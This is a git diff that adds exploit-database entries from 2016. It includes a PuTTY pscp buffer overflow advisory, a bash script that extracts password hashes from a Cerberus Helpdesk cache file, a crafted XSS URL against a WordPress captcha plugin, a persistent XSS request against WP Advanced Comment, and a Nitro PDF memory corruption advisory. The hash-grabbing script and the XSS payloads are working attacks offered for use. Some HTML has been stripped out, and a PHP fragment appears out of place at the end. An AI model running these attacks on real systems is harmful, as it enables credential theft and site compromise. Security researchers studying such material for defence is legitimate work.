+Date: Feb 20th, 2016
+Name: putty
+Vendor: sgtatham - http://www.chiark.greenend.org.uk/~sgtatham/putty/
+
+Version: 0.59 [3] (~9 years ago) <= affected <= 0.66
+Platform(s): win/nix
+Technology: c
+
+Vuln Classes: stack buffer overwrite (CWE-121)
+Origin: remote
+Min. Privs.: post auth
+CVE: CVE-2016-2563
+
+Summary
+
+The putty SCP command-line utility (pscp) is missing a bounds-check for a stack buffer when processing the SCP-SINK file-size response to a SCP download request. This may allow a malicious server to overwrite the stack buffer within the client- application potentially leading to remote code execution.
+
+PoC attached. patch attached.
+
+Besides that, two minor issues have been reported in putty packet handling:
+
+DoS condition in the parsing of SSH-Strings that lead to a nullptr read. (connect putty to poc.py and type x11exploit to trigger one of multiple occurrence of a crash, also works with x11forwarding disabled in putty)
+DoS condition in the handling of unrequested forwarded-tcpip channels open requests that lead to a nullptr read. (connect putty to poc.py and type forwardedtcpipcrash to trigger crash)
+
+Details
+
+The vulnerable code is located in pscp.c [4] line 1498 (HEAD) and is based on an unbound sscanf string format descriptor storing an arbitrary length string in a 40byte fixed size stack buffer sizestr[40].
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39551.zip
+
diff --git a/platforms/php/webapps/39526.sh b/platforms/php/webapps/39526.sh
new file mode 100755
index 000000000..5bd847da8
--- /dev/null
+++ b/platforms/php/webapps/39526.sh
@@ -0,0 +1,38 @@
+#!/bin/bash
+#####################################################################################
+# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
+# Date: 04.02.2016 #
+# Exploit Author: asdizzle_ #
+# Vendor Homepage: http://www.cerberusweb.com/ #
+# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
+# Version: 5 - 6.7 #
+# Tested on: Debian 8 / apache2 with cerb 5 #
+#####################################################################################
+# Prerequisites: #
+# -At least one worker must be logged in #
+# -/storage/tmp/ dir must be accessible #
+# #
+# If everything else fails try if there's directory listing in /storage/tmp #
+# You might find attachments and even support tickets. #
+#####################################################################################
+
+url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
+pre='devblocks' # If this doesn't work try 'zend'
+
+echo "[*] Trying to fetch cache file"
+
+cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
+if [ -z "$cachechk" ];then
+ echo "[-] File not found."
+ exit
+else
+ echo "[+] Found. Extracting..."
+ hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
+ if [ -z "$hashes" ];then
+ echo "[-] Hash extracting failed"
+ else
+ echo "[+] Extracting seems to have worked"
+ echo
+ echo "$hashes"
+ fi
+fi
diff --git a/platforms/php/webapps/39547.txt b/platforms/php/webapps/39547.txt
new file mode 100755
index 000000000..c96fa5885
--- /dev/null
+++ b/platforms/php/webapps/39547.txt
@@ -0,0 +1,34 @@
+* Exploit Title: BWS Captcha Multiple Vulnerabilities
+* Discovery Date:12.03.2015
+* Public Disclosure Date:03.10.2016
+* Exploit Author: Colette Chamberland
+* Contact: colette@wordfence.com
+* Vendor Homepage: http://bestwebsoft.com/
+* Software Link: https://wordpress.org/plugins/captcha/
+* Version: <=4.1.5
+* Tested on: Wordpress 4.2.x
+* Category: Wordpress
+* CVE: Requested but none received
+
+Description
+================================================================================
+Unsanitized input in whitelist.php:
+
+297: $message = __( 'Search results for', $this->textdomain ) . ' : ' . $_REQUEST['s'];
+
+
+PoC
+================================================================================
+The variable can be passed in using a get as well as a post. An attacker
+could send unsuspecting authenticated admin a url crafted like such:
+
+http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
+
+or they can send a form (no CSRF token check)
+
+
+
+and it would execute XSS as long as they were logged in to the site.
diff --git a/platforms/php/webapps/39548.txt b/platforms/php/webapps/39548.txt
new file mode 100755
index 000000000..3c4acf2a0
--- /dev/null
+++ b/platforms/php/webapps/39548.txt
@@ -0,0 +1,194 @@
+1. Introduction
+
+
+# Exploit Title: WordPress WP Advanced Comment 0.10 Persistent XSS
+# Date: Mar.09.2016
+# Exploit Author: Mohammad Khaleghi
+# Contact: https://twitter.com/_blackmatrix
+# Vendor: Ravi Shakya
+# Tested On: Apache2.2 / PHP5 / Kali 64 / WordPress 4.4.1
+# Category: Webapps
+# Software Link: https://wordpress.org/support/plugin/wp-advance-comment
+
+
+
+2. Description
+
+WP Advanced Comment 0.10 plugin does not have XSS protection, which means that an attacker can change the POST request , value of " name="comment[meta_value]" " parameter , it's not escaped . XSS is visible for admin
+
+File : wp-content\plugins\wp-advance-comment\shortcodes\comment-form.php
+
+
+
+
+show_like_dislike_button( $value['comment_ID'] ,
+ $option[$id]['other'] , 'top' );
+
+ echo ''.$value['comment_content'].'
';
+
+ echo $this->show_like_dislike_button( $value['comment_ID'] ,
+ $option[$id]['other'] , 'bottom' );
+
+}?>
+
+
+
+
+
+
+
+
+
+
+
+
+3. Proof of Concept
+
+Request :
+__________________________________________________________________________
+
+Host=127.0.0.1:8080
+User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
+Accept=*/*
+X-Requested-With=XMLHttpRequest
+Referer=http://127.0.0.1:8080/wordpress/2016/02/02/hello-world/
+Content-Length=1399
+Content-Type=multipart/form-data;
+boundary=---------------------------23741051518289624461916684164
+
+Cookie=wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C5a52d446b3c1782856a5021a38e5b1431297eca6fa81946694ebfdf305 994a84; wordpress_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7Cfeedc6beb6fc4d7fc7719fd1e45666b270f598a8294df146742750fd43 2ca5b3; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=bourne %7C1455436892%7CVRgNbhd39pxXUlNXcCTkDnTbZTCudBIJlfSocx8yFWh %7C80f4e9b382b8b316ba8967a1651ea91cecc45300c13c754f528a17ade8 475032; wp-settings-time-1=1454782581; wp-settings-time-2=1454752438; wordpress_logged_in_72672e10a1f0c9288ac55a4f4fc9805d=bourne %7C1455962074%7C0QblET9IPqz4apEnQsVq0WOUr7oY1EU25wIcKVKF4sY %7C8ff14befe34a2a5f1c4c6d93123e6afce4af2c43272a0351f2ce9b1499 1c180f; wordpress_test_cookie=WP+Cookie+check
+
+Connection=keep-alive
+Pragma=no-cache
+Cache-Control=no-cache
+
+POSTDATA =-----------------------------23741051518289624461916684164
+
+Content-Disposition: form-data; name="action"
+
+wpad_save_comment
+
+-----------------------------
+
+23741051518289624461916684164 Content-Disposition: form-data; name="post_id"
+
+
+1
+
+-----------------------------
+
+23741051518289624461916684164 Content-Disposition: form-data; name="form_id"
+
+417
+
+-----------------------------
+23741051518289624461916684164 Content-Disposition: form-data; name="email_me_on_approve"
+
+undefined
+
+-----------------------------
+23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_value]"
+
+bourne
+
+-----------------------------
+23741051518289624461916684164 Content-Disposition: form-data; name="user_name[meta_key]"
+
+user_name
+
+-----------------------------
+23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_value]"
+
+jason_bourne110@yahoo.com
+
+-----------------------------
+
+23741051518289624461916684164 Content-Disposition: form-data; name="user_email[meta_key]"
+
+user_email
+
+-----------------------------
+
+23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_value]"
+
+Hack
+
+-----------------------------
+23741051518289624461916684164 Content-Disposition: form-data; name="comment[meta_key]"
+
+comment
+
+-----------------------------
+23741051518289624461916684164--
+
+
+Response
+______________________________________________________________________
+
+Status=OK - 200
+Date=Sat, 06 Feb 2016 18:18:43 GMT
+Server=Apache X-Frame-Options=SAMEORIGIN, SAMEORIGIN X-Powered-By=PHP/5.5.29 X-Robots-Tag=noindex x-content-type-options=nosniff Expires=Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control=no-cache, must-revalidate, max-age=0 Pragma=no-cache
+Content-Length=7
+Keep-Alive=timeout=5, max=100
+Connection=Keep-Alive
+Content-Type=text/html; charset=UTF-8
+
+
+
+4. Report Timeline
+
+09-03-2016 : Discovered
+09-03-2016 : Vendor notified
+09-03-2016 : Vendor Responded
+09-03-2016 : Vendor fixed the problem
+
+
+5. Solution
+
+Update to version 0.11
diff --git a/platforms/windows/dos/39546.txt b/platforms/windows/dos/39546.txt
new file mode 100755
index 000000000..40f948f53
--- /dev/null
+++ b/platforms/windows/dos/39546.txt
@@ -0,0 +1,71 @@
+#####################################################################################
+
+Application: Nitro PDF
+
+Platforms: Windows
+
+Versions: Nitro Pro 10.5.7.32 and lower & Nitro Reader 5.5.3.1 and lower
+
+Author: Francis Provencher of COSIG
+
+Website: http://www.protekresearchlab.com/
+
+Twitter: @COSIG_ @protekresearch
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+Nitro develops commercial software used to create, edit, sign, and secure Portable Document Format (PDF) files and digital documents. The Nitro ecosystem consists of Nitro Pro, Nitro Cloud, Nitro Reader, and a suite of document conversion sites.
+
+Nitro’s product family is intended for the professional market and although its desktop products are Windows-only, Nitro Cloud is compatible with any web browser on any machine. The Nitro PDF Reader is freeware for both personal and professional use.
+
+(https://en.wikipedia.org/wiki/Nitro_PDF)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-12-29: Francis Provencher from COSIG report issue to GoNitro sales team;
+2016-01-02: GoNitro confirmed this issue;
+2016-01-21: GoNitro fixed this issue;
+
+https://www.gonitro.com/support/security-update
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Nitro PDF 10 (10.5.7.32).
+User interaction is required to exploit this vulnerability in that the target must open a malicious file.
+
+A specially crafted PDF with a specific FunctionType 0 and an invalid /Domain can force an heap memory corruption
+
+by pointing to an uninitialized space of memory.An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.1
+
+.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-13.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39546.zip
+
+###############################################################################
+ $value1 ){ + $show_admin = isset($value1['show_admin']) ? + $value1['show_admin'] : 0; $privelage = $this->check_administrator( $show_admin ); + + if ( !empty( $value1['meta_key'] ) && is_numeric( $key ) && $value1['meta_key'] != 'user_name' && $value1 + ['meta_key'] != 'user_email' && $value1['custom_field'] != 'user_image' && + $value1['meta_key'] != 'wpad_comment' && $privelage == true ) { + + $meta_key = $value1['meta_key']; + $label = $value1['label']; + + $meta_value = get_comment_meta( $value['comment_ID'] , + $meta_key , true ); if( !empty( $meta_value ) ) { + + if( $value1['custom_field'] == 'radio' ) { + + $radio_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'radio' ); + $this->display_comment_metas_frontend( $label , $radio_value ); + } + elseif ( $value1['custom_field'] == 'checkbox' ) { + + $check_value = $this->get_corresponding_metakey( $value1 , $meta_value , 'checkbox'); + $this->display_comment_metas_frontend( $label , $check_value ); } + else { + $this->display_comment_metas_frontend( $label , $meta_value ); + } + + } + } + } + + ?> +
+